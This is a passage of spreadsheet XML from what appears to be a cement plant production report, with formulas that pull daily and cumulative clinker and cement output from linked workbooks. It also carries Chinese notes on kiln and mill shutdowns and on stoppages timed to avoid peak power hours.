        <f>'[12]10'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'9'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'9'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]10'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]10'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]10'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'9'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]10'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'9'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]10'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'9'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'9'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]10'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]10'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]10'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'9'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]10'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'9'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]10'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'9'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'9'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]10'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]10'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]10'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'9'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]10'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'9'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]10'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]10'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]10'!$E$24</f>
        <v>1765</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'9'!H51</f>
        <v>51925.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1428324.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]10'!$I$24</f>
        <v>4916.57</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'9'!K51</f>
        <v>50856.839</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1413980.77</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]10'!$L$24</f>
        <v>49767.8449999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>110.595211111111</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]10'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]10'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]10'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'9'!U51</f>
        <v>2407.92</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>65406.391</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]10'!$V$30</f>
        <v>74</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'9'!X51</f>
        <v>2190.638</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>62806.875</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]10'!$Y$30</f>
        <v>3468.65600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]10'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]10'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'9'!H52</f>
        <v>2e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]10'!$I$19</f>
        <v>1285.88</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'9'!K52</f>
        <v>51430.421</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1333124.621</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]10'!$L$19</f>
        <v>53616.0220000504</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>36.9765668965865</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'[13]10'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]10'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'9'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]10'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'9'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]10'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]10'!$M$21+'[14]10'!$M$22+'[14]10'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]10'!$N$21+'[14]10'!$N$22+'[14]10'!$N$35</f>
        <v>87.77</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'9'!U53</f>
        <v>513.44</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38847.867</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]10'!$Q$21+'[14]10'!$Q$22+'[14]10'!$Q$35</f>
        <v>58</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'9'!X53</f>
        <v>563</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40054</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]10'!$T$21+'[14]10'!$T$22+'[14]10'!$T$35</f>
        <v>1599.387</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]10'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'9'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]10'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'9'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]10'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]10'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]10'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]10'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'9'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]10'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'9'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]10'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]10'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'9'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]10'!$I$63</f>
        <v>157.88</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'9'!K55</f>
        <v>1647.896</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>37083.546</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]10'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]10'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]10'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]10'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]10'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]10'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]10'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]10'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]10'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'9'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'9'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]10'!$Q$62</f>
        <v>1#窑:14:58-24:00错峰停窑。2#窑:续停。水泥磨:1#磨：8:00-22:40避峰停机；2#磨：10:00-22:10避峰停机；3#磨：大修续停；4#磨：10:00-22:30避峰停机。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G57+'9'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'9'!K57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G58+'9'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'9'!K58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G59+'9'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'9'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]10'!$Q$65</f>
        <v>窑:正常。A组磨：正常。D1#磨：8:00-16:50避峰停机，D2#磨：8:00-16:50避峰停机。</v>
      </c>
      <c r="R59" s="272"/>
      <c r="S59" s="272"/>
      <c r="T59" s="272"/>
      <c r="U59" s="272"/>
      <c r="V59" s="272"/>
      <c r="W59" s="272"/>
      <c r="X59" s="272"/>
      <c r="Y59" s="272"/>
      <c r="Z59" s="273"/>
    </row>
    <row r="60" ht="15.75" customHeight="1" spans="1:26">
      <c r="A60" s="191"/>
      <c r="B60" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C60" s="193"/>
      <c r="D60" s="193"/>
      <c r="E60" s="194"/>
      <c r="F60" s="194"/>
      <c r="G60" s="225"/>
      <c r="H60" s="194">
        <f>G60+'9'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'9'!K60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'[14]10'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]10'!$E$6</f>
        <v>3117</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'9'!H61</f>
        <v>35888</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1151761</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]10'!$E$21</f>
        <v>4121.75</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'9'!K61</f>
        <v>38900.93</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1140061.01</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]10'!$H$6</f>
        <v>34756.2399999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>66.8389230769229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'[14]10'!$M$11+'[14]10'!$M$12+'[14]10'!$M$13+'[14]10'!$M$14+'[14]10'!$M$15+'[14]10'!$M$16+'[14]10'!$M$17+'[14]10'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]10'!$N$11+'[14]10'!$N$12+'[14]10'!$N$13+'[14]10'!$N$14+'[14]10'!$N$15+'[14]10'!$N$16+'[14]10'!$N$17+'[14]10'!$N$18</f>
        <v>4288</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'9'!H62</f>
        <v>24991</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>860984.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]10'!$Q$11+'[14]10'!$Q$12+'[14]10'!$Q$13+'[14]10'!$Q$14+'[14]10'!$Q$15+'[14]10'!$Q$16+'[14]10'!$Q$17+'[14]10'!$Q$18</f>
        <v>2398</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'9'!K62</f>
        <v>25742</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>860214.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]10'!$T$11+'[14]10'!$T$12+'[14]10'!$T$13+'[14]10'!$T$14+'[14]10'!$T$15+'[14]10'!$T$16+'[14]10'!$T$17+'[14]10'!$T$18</f>
        <v>17703.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>70.8145359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]10'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]10'!$M$19+'[14]10'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]10'!$N$19+'[14]10'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'9'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]10'!$Q$19+'[14]10'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'9'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]10'!$T$19+'[14]10'!$T$20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G64+'9'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'9'!K64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G65+'9'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'9'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]10'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:55避峰停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。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G66+'9'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'9'!K66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G67+'9'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'9'!K67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'[15]10'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]10'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'9'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]10'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'9'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]10'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]10'!$Q$77</f>
        <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨10:00-22:15避峰停机:12.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]10'!$D$43+'[15]10'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]10'!$E$43+'[15]10'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'9'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]10'!$H$43+'[15]10'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'9'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]10'!$K$43+'[15]10'!$K$44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'[15]10'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]10'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'9'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]10'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'9'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]10'!$K$45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G71+'9'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'9'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]10'!$Q$80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G72+'9'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'9'!K72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G73+'9'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'9'!K73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G74+'9'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'9'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]10'!$Q$83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G75+'9'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'9'!K75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G76+'9'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'9'!K76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G77+'9'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'9'!K77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G78+'9'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'9'!K78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'[16]10'!$E$7</f>
        <v>527.74</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'9'!H79</f>
        <v>5252.94</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>152381.41</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]10'!$I$7</f>
        <v>407.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'9'!K79</f>
        <v>5192</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>147083.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]10'!$L$7</f>
        <v>4945.72</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.89144</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'[16]10'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'9'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]10'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'9'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]10'!$Y$15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G81+'9'!H81</f>
        <v>0</v>
